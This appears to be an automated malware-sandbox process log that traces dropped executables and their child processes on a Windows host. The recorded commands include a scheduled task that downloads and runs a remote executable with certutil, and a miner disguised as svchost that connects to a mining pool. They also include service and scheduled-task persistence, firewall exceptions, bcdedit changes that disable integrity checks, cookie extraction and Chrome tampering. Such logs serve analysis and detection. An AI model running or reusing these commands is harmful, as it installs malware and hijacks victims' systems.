C:\Users\Admin\AppData\Local\Temp\521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe
"C:\Users\Admin\AppData\Local\Temp\521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1.exe"
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4764

C:\Users\Admin\AppData\Local\Temp\B56B.exe
C:\Users\Admin\AppData\Local\Temp\B56B.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo MFbR
2⤵
PID:860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
2⤵
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\SysWOW64\cmd.exe
cmd
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\BB48.exe
C:\Users\Admin\AppData\Local\Temp\BB48.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Users\Admin\AppData\Local\Temp\BCEF.exe
C:\Users\Admin\AppData\Local\Temp\BCEF.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lwnfwaqj\
2⤵
PID:1192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\otdysebd.exe" C:\Windows\SysWOW64\lwnfwaqj\
2⤵
PID:2532

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create lwnfwaqj binPath= "C:\Windows\SysWOW64\lwnfwaqj\otdysebd.exe /d\"C:\Users\Admin\AppData\Local\Temp\BCEF.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:2848

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description lwnfwaqj "wifi internet conection"
2⤵
PID:1780

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start lwnfwaqj
2⤵
PID:4544

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\C915.exe
C:\Users\Admin\AppData\Local\Temp\C915.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Users\Admin\AppData\Local\Temp\CA6E.exe
C:\Users\Admin\AppData\Local\Temp\CA6E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4532

C:\Users\Admin\AppData\Local\Temp\CA6E.exe
C:\Users\Admin\AppData\Local\Temp\CA6E.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:196

C:\Windows\SysWOW64\lwnfwaqj\otdysebd.exe
C:\Windows\SysWOW64\lwnfwaqj\otdysebd.exe /d"C:\Users\Admin\AppData\Local\Temp\BCEF.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3928

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
3⤵
PID:5812

C:\Users\Admin\AppData\Local\Temp\D1B2.exe
C:\Users\Admin\AppData\Local\Temp\D1B2.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4476

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:4692

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:1424

C:\Users\Admin\AppData\Local\Temp\DB68.exe
C:\Users\Admin\AppData\Local\Temp\DB68.exe
1⤵
- Executes dropped EXE
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 360
2⤵
- Program crash
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 344
2⤵
- Program crash
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 376
2⤵
- Program crash
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 624
2⤵
- Program crash
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 660
2⤵
- Program crash
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 696
2⤵
- Program crash
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 628
2⤵
- Program crash
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 708
2⤵
- Program crash
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 728
2⤵
- Program crash
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 776
2⤵
- Program crash
PID:1040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 640
2⤵
- Program crash
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 772
2⤵
- Program crash
PID:6228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 688
2⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 808
2⤵
- Program crash
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 852
2⤵
- Program crash
PID:8132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 768
2⤵
- Program crash
PID:496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 692
2⤵
- Program crash
PID:8540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 688
2⤵
- Program crash
PID:8684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 640
2⤵
- Program crash
PID:9000

C:\Users\Admin\AppData\Local\Temp\DB68.exe
"C:\Users\Admin\AppData\Local\Temp\DB68.exe"
2⤵
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 324
3⤵
- Program crash
PID:512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 312
3⤵
- Program crash
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 340
3⤵
- Program crash
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 600
3⤵
- Program crash
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 632
3⤵
- Program crash
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 668
3⤵
- Program crash
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 540
3⤵
- Program crash
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 560
3⤵
- Program crash
PID:6212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 756
3⤵
- Program crash
PID:6868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 564
3⤵
- Program crash
PID:7080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 756
3⤵
- Program crash
PID:7692

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:7788

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:7952

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /15-15
3⤵
PID:8944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 360
4⤵
- Program crash
PID:8060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 336
4⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 376
4⤵
- Program crash
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 624
4⤵
- Program crash
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 660
4⤵
- Program crash
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 676
4⤵
- Program crash
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 628
4⤵
- Program crash
PID:5316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 708
4⤵
- Program crash
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 800
4⤵
- Program crash
PID:7336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 828
4⤵
- Program crash
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 848
4⤵
- Program crash
PID:6248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 864
4⤵
- Program crash
PID:6668

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:6776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1372
4⤵
- Program crash
PID:7136

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:7260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1424
4⤵
- Program crash
PID:7488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1472
4⤵
- Program crash
PID:7812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1348
4⤵
- Program crash
PID:8212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1480
4⤵
- Program crash
PID:8584

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:2000

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
5⤵
- Modifies boot configuration data using bcdedit
PID:6052

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:7396

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:6116

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
5⤵
- Modifies boot configuration data using bcdedit
PID:4080

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:6300

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:6836

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
5⤵
- Modifies boot configuration data using bcdedit
PID:5664

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
5⤵
- Modifies boot configuration data using bcdedit
PID:6520

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
5⤵
- Modifies boot configuration data using bcdedit
PID:6396

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
5⤵
- Modifies boot configuration data using bcdedit
PID:7044

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
5⤵
- Modifies boot configuration data using bcdedit
PID:5640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
5⤵
- Modifies boot configuration data using bcdedit
PID:6788

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
5⤵
- Modifies boot configuration data using bcdedit
PID:6808

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
5⤵
- Modifies boot configuration data using bcdedit
PID:7176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1496
4⤵
- Program crash
PID:7528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1508
4⤵
- Program crash
PID:8100

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:6976

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
4⤵
PID:7596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8944 -s 1516
4⤵
- Program crash
PID:8220

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
4⤵
PID:8536

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:8608

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:8160

C:\Users\Admin\AppData\Local\Temp\DEB4.exe
C:\Users\Admin\AppData\Local\Temp\DEB4.exe
1⤵
- Executes dropped EXE
PID:3864

C:\Users\Admin\AppData\Local\Temp\is-BLP65.tmp\DEB4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BLP65.tmp\DEB4.tmp" /SL5="$E0030,298255,214528,C:\Users\Admin\AppData\Local\Temp\DEB4.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:724

C:\Users\Admin\AppData\Local\Temp\is-QTV21.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-QTV21.tmp\def.exe" /S /UID=lab212
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:388

C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe
"C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe" /VERYSILENT
4⤵
- Executes dropped EXE
PID:3644

C:\Users\Admin\AppData\Local\Temp\is-24I4U.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-24I4U.tmp\prolab.tmp" /SL5="$201D2,575243,216576,C:\Program Files\Windows Defender\MJZQZMALRA\prolab.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3096

C:\Users\Admin\AppData\Local\Temp\3e-e96b8-0f2-46c95-e49d7eec99f02\Sebyjaseku.exe
"C:\Users\Admin\AppData\Local\Temp\3e-e96b8-0f2-46c95-e49d7eec99f02\Sebyjaseku.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fuhmhqaq.tbh\md7_7dfj.exe & exit
5⤵
PID:5624

C:\Users\Admin\AppData\Local\Temp\fuhmhqaq.tbh\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\fuhmhqaq.tbh\md7_7dfj.exe
6⤵
- Executes dropped EXE
PID:6752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ouuk3qp2.pc4\askinstall18.exe & exit
5⤵
PID:8496

C:\Users\Admin\AppData\Local\Temp\ouuk3qp2.pc4\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\ouuk3qp2.pc4\askinstall18.exe
6⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:5164

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:5440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4qjotlvc.okg\customer4.exe & exit
5⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\4qjotlvc.okg\customer4.exe
C:\Users\Admin\AppData\Local\Temp\4qjotlvc.okg\customer4.exe
6⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
7⤵
PID:7028

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
8⤵
- Kills process with taskkill
PID:8840

C:\Windows\regedit.exe
regedit /s chrome.reg
8⤵
- Runs .reg file with regedit
PID:8888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
8⤵
PID:5664

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
9⤵
PID:6380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"
10⤵
PID:6036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
11⤵
PID:6644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff942376e00,0x7ff942376e10,0x7ff942376e20
12⤵
PID:7288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:2
12⤵
PID:7588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1712 /prefetch:8
12⤵
PID:8292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
12⤵
PID:9020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2804 /prefetch:1
12⤵
PID:1376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1044 /prefetch:1
12⤵
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3272 /prefetch:8
12⤵
PID:8304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
12⤵
PID:8412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
12⤵
PID:8528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
12⤵
PID:8400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4192 /prefetch:8
12⤵
PID:9148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
12⤵
PID:7468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4296 /prefetch:8
12⤵
PID:8144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4184 /prefetch:8
12⤵
PID:8764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4668 /prefetch:8
12⤵
PID:1764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:8
12⤵
PID:6324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
12⤵
PID:8564

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
12⤵
PID:2964

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7652f7740,0x7ff7652f7750,0x7ff7652f7760
13⤵
PID:8016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:8
12⤵
PID:9084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,18390700321952978683,13163009148792078760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3824 /prefetch:8
12⤵
PID:7836

C:\Program Files\Google\Chrome\Application\chrome.exe
